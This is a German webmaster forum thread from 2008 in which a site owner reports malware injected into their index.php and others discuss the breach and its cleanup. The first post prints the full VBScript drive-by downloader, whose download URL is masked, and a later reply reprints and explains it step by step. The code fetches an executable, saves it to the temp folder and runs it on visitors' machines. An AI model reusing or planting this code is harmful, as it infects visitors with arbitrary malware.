Anzeige - [Interessiert an einer Anzeige?]
(?) Tags raten (?) (edit)
Seiten: (2) [1] 2  ( Neuster Beitrag anzeigen )
Reply to this topicStart new topicStart Poll
> Website gehackt, Virus on Board
spacefun
Geschrieben am: Do 28.02.2008, 13:54
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 260
Mitglied seit: 24.01.2004


Hallo

Routinemässig überprüfte ich meine Website auf Validation und enddeckte 5 Fehler die nur ein paar Tage alt sein konnten. Ich begann den Fehler zu suchen und fand ein Virus in der index.php
Als ich die index.php herunterladen wollte schlug mein Virenscaner Alarm. Laut Virenscanner ist es ein:


HTML/Rce.Gen - Malware

Name: HTML/Rce.Gen
Entdeckt am: 14/08/2007
Art: Trojan
In freier Wildbahn: Ja
Gemeldete Infektionen: Niedrig
Verbreitungspotenzial: Niedrig
Schadenspotenzial: Niedrig
Statische Datei: Nein
Engine Version: 7.04.01.62


Unten in rot die Malware:

?><script language="VBscript">
On Error Resume Next

url = "******.exe"
Set xml = document.createElement("object")
xml.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set HTP = xml.CreateObject("Microsoft.XMLHTTP", "")

S1 = "Ad"
S2 = "od"
S3 = "b."
S4 = "ST"
S5 = "re"
S6 = "am"

Set AdbS = xml.CreateObject(S1 & S2 & S3 & S4 & S5 & S6, "")
AdbS.Type = 1

HTP.open "GET", url, False
HTP.Send

Set FSO = xml.CreateObject("Scripting.FileSystemObject", "")
Set tmp = FSO.GetSpecialFolder(2)
FileName = FSO.GetFileName(url)
FileName = FSO.BuildPath(tmp, FileName)

AdbS.open
AdbS.write HTP.responseBody
AdbS.SaveToFile FileName, 2
AdbS.Close

Set WSH = xml.CreateObject("Shell.Application", "")
WSH.ShellExecute FileName, "", "", "open", 1

</Script>


Ich habe jetzt alle Passwörter geändert. Ich hoffe das reicht. Seit also vorsichtig und checkt eure Webseiten ab und zu.



Gruss space dry.gif
Top
PM
Top
 
 
msolt
#2 Geschrieben am: Do 28.02.2008, 14:13 (+00:18)
Report PostQuote Post

AyomRank 4
********

Gruppe: Member (aktiv)
Beiträge: 122
Mitglied seit: 30.04.2005


Danke für den Hinweis.
Benutzt du ein OpenSource CMS oder hast du was selbst geschrieben?
Top
PMEmail Poster
Top
 
sd12
#3 Geschrieben am: Do 28.02.2008, 14:25 (+00:12)
Report PostQuote Post

AyomRank 9
Group Icon

Gruppe: Moderatoren
Beiträge: 3580
Mitglied seit: 3.03.2004


Gib mal die URL her...

Es ist davon auszugehen, dass die Index.php über ein Sicherheitsloch verändert wurde.


--------------------
************************
Treiber f[r das Kezboard ist [berfl[ssig.
Top
PMEmail PosterICQMSN
Top
 
spacefun
#4 Geschrieben am: Do 28.02.2008, 14:29 (+00:03)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 260
Mitglied seit: 24.01.2004


Hallo

Es handelt sich um ein sehr gutes, stabiles und auch sicheres CMS. Ich habe es dem Sicherheitsteam schon gemeldet und die schauen es sich näher an. Allerdings laufen unter demselben Space noch weitere Scripte und so kann ich nicht mit Sicherheit sagen, wo das Leck liegt.
Auf jeden Fall lösche ich alle Dateien und und installiere eine Sicherungskopie die ich durch den Virenscanner geprüft habe.


Das überprüfen der Dateien ist einfach. Alles per FTP herunterladen und dann schlägt der Virenscanner des PCs Alarm, falls eine Datei verseucht ist.

Gruss space
Top
PM
Top
 
sd12
#5 Geschrieben am: Do 28.02.2008, 15:17 (+00:48)
Report PostQuote Post

AyomRank 9
Group Icon

Gruppe: Moderatoren
Beiträge: 3580
Mitglied seit: 3.03.2004


Das bringt Dir nix...

Kleines BEispiel.

Der Schadcode wird via JS von einem anderen Webspace nachgeladen somit ist Deine Website für den Virenscanner sauber.


--------------------
************************
Treiber f[r das Kezboard ist [berfl[ssig.
Top
PMEmail PosterICQMSN
Top
 
spacefun
#6 Geschrieben am: Do 28.02.2008, 15:21 (+00:04)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 260
Mitglied seit: 24.01.2004


Hallo SD

Ich denke das geht schon. Ich lösche ja die ganze Webpräsenz und lade nur geprüfte Dateien hoch. Da kann danach kein Code mehr versteckt sein.

Gruss space dry.gif
Top
PM
Top
 
Flipper
Felgenspezi2000
#7 Geschrieben am: Do 28.02.2008, 15:22 (+00:00)
Report PostQuote Post

AyomRank 4
********

Gruppe: Member (aktiv)
Beiträge: 53
Mitglied seit: 29.07.2007


Ein sehr gutes Gegenmittel dagegen ist das kostenlose Script "CrawlTrack". Es wird einfach per FTP auf den Server geladen und durch eine einfache Zeile in der index.php im Rootverzeichnis aktiviert.

Hervorragend ist auch die Analyse zur Indexierung Deiner Seite von Suchmaschinenbots.

Das Script erhälst Du hier: http://www.crawltrack.fr/

Bin für jede Frage hierzu offen.

Ich nutze es in Verbindung mit Joomla seit einer Woche nach einem fiesen Hack und habe bereits erfolgreich über 100 diverse Hackversuche abgewehrt ;-)

Gruss


--------------------
Top
PMEmail PosterUsers Website
Top
 
sd12
#8 Geschrieben am: Do 28.02.2008, 15:23 (+00:01)
Report PostQuote Post

AyomRank 9
Group Icon

Gruppe: Moderatoren
Beiträge: 3580
Mitglied seit: 3.03.2004


Aber an einem include eines externen JS ist nix zu erkennen...


--------------------
************************
Treiber f[r das Kezboard ist [berfl[ssig.
Top
PMEmail PosterICQMSN
Top
 
spacefun
#9 Geschrieben am: Do 28.02.2008, 15:25 (+00:01)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 260
Mitglied seit: 24.01.2004


Hallo Flipper

Super Idee! Das probiere ich gleich aus.

space wink.gif
Top
PM
Top
 
spacefun
#10 Geschrieben am: Do 28.02.2008, 15:36 (+00:10)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 260
Mitglied seit: 24.01.2004


Hallo SD

Ich probiere mal den Tip von Flipper aus und installiere die diversen Scripts neu. Da warten ein paar Stunden Arbeit mad.gif

gruss space
Top
PM
Top
 
deetee
#11 Geschrieben am: Do 28.02.2008, 16:06 (+00:30)
Report PostQuote Post

AyomRank 4
********

Gruppe: Member (aktiv)
Beiträge: 80
Mitglied seit: 11.12.2004


@sd12
Woran erkennst du, dass JavaScript im Spiel ist?
Top
PMEmail Poster
Top
 
sd12
#12 Geschrieben am: Do 28.02.2008, 16:30 (+00:23)
Report PostQuote Post

AyomRank 9
Group Icon

Gruppe: Moderatoren
Beiträge: 3580
Mitglied seit: 3.03.2004


Nein, ich erkenne das nicht, aber es könnte auf IRGENDEINER anderen Seite z.B. Schadhafter Code via Javascript nachgeladen werden....


--------------------
************************
Treiber f[r das Kezboard ist [berfl[ssig.
Top
PMEmail PosterICQMSN
Top
 
spacefun
#13 Geschrieben am: Do 28.02.2008, 16:43 (+00:12)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 260
Mitglied seit: 24.01.2004


Das betrübliche am Ganzen ist, das ich nur durch die Fehler im XHTML darauf gestossen bin.
Würde ich nicht so stark auf Validierung von HTML und CSS achten, wäre mir das nie aufgefallen.

Gruss space
Top
PM
Top
 
jAuer
Jürgen Auer - freiberufl. Programmierer
#14 Geschrieben am: Do 28.02.2008, 16:50 (+00:07)
Report PostQuote Post

AyomRank 9
Group Icon

Gruppe: Experten Entwicklung
Beiträge: 2313
Mitglied seit: 4.02.2006


QUOTE (spacefun @ Do 28.02.2008, 15:21)
Ich lösche ja die ganze Webpräsenz und lade nur geprüfte Dateien hoch. Da kann danach kein Code mehr versteckt sein.

Das ist völlig irrelevant.

Eines der vorhandenen Scripte hat diese Lücke ermöglicht.

Solange das drauf bleibt, kann das Sekunden nach dem Aufspielen erneut gehackt werden. Sprich: Download, Offline-Überprüfung und Hochladen ist bloß Beschäftigungstherapie.

Aktuell würde nur helfen, PHP und alle anderen Scripte komplett abzuschalten - bis der Fehler gefunden ist.

Auch das Ändern von Passwörtern ist irrelevant. Das ist wahrscheinlich eine Folge des erfolgreichen Hacks - aber nicht das Einfallstor.


--------------------
Web-Anwendung 3.0: Ein Online-Kalender für Termine vieler Filialen.

server-daten - die Single-Data-Solution: Web-Datenbanken als Online - CRM - Lösung.
Ihre Geschäftsprozesse entscheiden, was Ihre Online-Datenbank macht. Sie konzentrieren sich auf Ihr Kerngeschäft - die Datenbank funktioniert.
Top
PMEmail PosterUsers Website
Top
 
spacefun
#15 Geschrieben am: Do 28.02.2008, 16:58 (+00:07)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 260
Mitglied seit: 24.01.2004


Hallo jAuer

Das habe ich inzwischen leider auch feststellen müssen dry.gif

Ich lösche deshalb alle bestehenden Scripte und installiere die jeweils neuste Version. Auch wenn das viel Arbeit bedeutet ist dies wohl die beste Lösung.

gruss space
Top
PM
Top
 
memoriam
#16 Geschrieben am: Do 28.02.2008, 17:26 (+00:28)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 435
Mitglied seit: 30.03.2005


Mal für die dicken, kleinen, Doofen: was macht denn das Script überhaupt? unsure.gif
Top
PMEmail PosterUsers Website
Top
 
marcus-j
#17 Geschrieben am: Do 28.02.2008, 17:48 (+00:21)
Report PostQuote Post

AyomRank 2
****

Gruppe: Member (aktiv)
Beiträge: 6
Mitglied seit: 28.02.2008


Es ist auch möglich, dass jemand einen Trojaner oder ähnliches spionage Programm
auf einem PC installiert hat, ( Automatisiert )
die Zugangsdaten mitloggt und nun zugriff auf den FTP server besitzt.

Dann hat das mit den scripten garnichts zu tun !
Top
PMEmail Poster
Top
 
spacefun
#18 Geschrieben am: Do 28.02.2008, 20:44 (+02:55)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 260
Mitglied seit: 24.01.2004


So, jetzt habe ich die Scripts neu installiert und zusätzlich das kleine Script "CrawlTrack". http://www.crawltrack.fr

Der erste Angriff wurde schon abgewehrt und ich werde das Script nun auf all meinen Projekten einsetzen.

In der Hoffnung auf Ruhe vor Hackern wink.gif

Gruss space
Top
PM
Top
 
spaceman007
#19 Geschrieben am: Do 28.02.2008, 20:59 (+00:15)
Report PostQuote Post

AyomRank 4
********

Gruppe: Member (aktiv)
Beiträge: 122
Mitglied seit: 23.03.2005


@memoriam

CODE

url = "******.exe"
Set xml = document.createElement("object")
xml.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set HTP = xml.CreateObject("Microsoft.XMLHTTP", "")


S1 = "Ad"
S2 = "od"
S3 = "b."
S4 = "ST"
S5 = "re"
S6 = "am"

Set AdbS = xml.CreateObject(S1 & S2 & S3 & S4 & S5 & S6, "")
AdbS.Type = 1

HTP.open "GET", url, False
HTP.Send


=> Das File "******.exe" wird heruntergeladen


CODE

Set FSO = xml.CreateObject("Scripting.FileSystemObject", "")
Set tmp = FSO.GetSpecialFolder(2)
FileName = FSO.GetFileName(url)
FileName = FSO.BuildPath(tmp, FileName)

AdbS.open
AdbS.write HTP.responseBody
AdbS.SaveToFile FileName, 2
AdbS.Close


=> File (exe) wird gespeichert

CODE

Set WSH = xml.CreateObject("Shell.Application", "")
WSH.ShellExecute FileName, "", "", "open", 1


=> File (exe) wird gestartet. Und zwar auf Lokal, auf dem Rechner des Users.

Was das exe macht, weiss der Geier. Stell Dir das schlimmste vor, genau das wäre möglich. Ist das gleiche wie wenn du einen Doppelklick auf eine .exe machst.

Sofern die Sicherheitseinstellungen Deines Browsers und Systemes nicht allzu hoch sind, kann das exe fast alles ausführen.

Gruss

Spaceman007


--------------------
think-> google -> post
http://www.buechergestell.ch
http://www.pickup-artists.ch
http://www.web24.ch Die neue Schweizer Suchmaschine!
Top
PMEmail Poster
Top
 
sd12
#20 Geschrieben am: Fr 29.02.2008, 00:27 (+03:27)
Report PostQuote Post

AyomRank 9
Group Icon

Gruppe: Moderatoren
Beiträge: 3580
Mitglied seit: 3.03.2004


QUOTE (spacefun @ Do 28.02.2008, 17:58)
Das habe ich inzwischen leider auch feststellen müssen dry.gif

Das wollte ich Dir vor ein paar Stunden erklären :-)


--------------------
************************
Treiber f[r das Kezboard ist [berfl[ssig.
Top
PMEmail PosterICQMSN
Top
 
Thema wird von 0 Benutzer(n) gelesen (0 Gäste und 0 anonyme Benutzer)
0 Mitglieder:
Trackback-Url: http://www.ayom.com/track/t/23188

Topic Options Seiten: (2) [1] 2  Reply to this topicStart new topicStart Poll

 


> Ähnliche Themen
Kaufen ein deutsche Website/Domain oder Text Link günter31 285 6 Fr 10.10.2008, 09:21
Mobile Website - Tools rabby 63 0 Mo 6.10.2008, 23:07
website lockept93 354 16 Fr 3.10.2008, 05:46
Sehr starke und alte Website sucht Linkpartner ninjas.de 286 2 Di 30.09.2008, 14:43
[B] Linkbuilding auf Ihre Website zugeschneidert Sarandella 100 0 Mo 22.09.2008, 14:07
meine Webseite wurde gehackt und verteilt malware Blume1 477 5 So 21.09.2008, 12:40
Website-Analyse-Tool-Suchen Partner für Vertrieb! Webspecial 92 0 Mo 8.09.2008, 17:32
eigene website? lockept93 485 27 Mi 3.09.2008, 16:20
Brauche Code um Werbung auf Website einzubinden Norbert Hofmann 269 2 Mo 25.08.2008, 20:58
Schon wieder... | Elite Sites - For every Website! Sanjo 250 8 So 24.08.2008, 09:15




Anzeige - [Interessiert an einer Anzeige?]



Anzeigen


[Interessiert an einer Anzeige?]